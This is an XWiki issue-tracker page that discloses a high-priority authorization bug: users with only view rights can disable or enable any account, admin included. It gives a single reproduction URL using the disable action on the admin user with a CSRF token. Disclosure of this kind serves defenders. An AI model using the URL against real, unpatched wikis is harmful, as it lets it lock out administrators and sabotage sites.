Uploaded image for project: 'XWiki Platform'
  1. XWiki Platform
  2. XWIKI-19792

Users with view rights can enable and disable any user account

    XMLWordPrintable

Details

    • High
    • Unknown
    • N/A

    Description

      Steps to reproduce:

      1. Go to <server>/xwiki/bin/view/XWiki/XWikiUserProfileSheet?action=disable&userId=XWiki.Admin&csrf=<token> where <token> is the CSRF token (can be found in the data-xwiki-form-token attribute of the <html> element).
      2. Log in as the admin user.

      Expected result:
      In the first step, false is displayed and in the second step, the admin user can be normally used.

      Actual result:
      In the first step, true is displayed and in the second step, the admin user gets the message "Your account has been disabled. Please contact the administrator if you think this is a mistake.".

      By replacing disable by enable in the first step, the account can be re-enabled. This has two consequences:

      1. The wiki can be sabotaged by disabling all users.
      2. Disabled users can easily re-enable themselves, at least on wikis that aren't private, I haven't checked if a logged-in user on a private wiki can also re-enable himself.

      It is not clear to me if the rights check should have been in the user profile or in the user script server which is why I've added both components.

      Attachments

        Activity

          People

            surli Simon Urli
            MichaelHamann Michael Hamann
            Votes:
            0 Vote for this issue
            Watchers:
            2 Start watching this issue

            Dates

              Created:
              Updated:
              Resolved: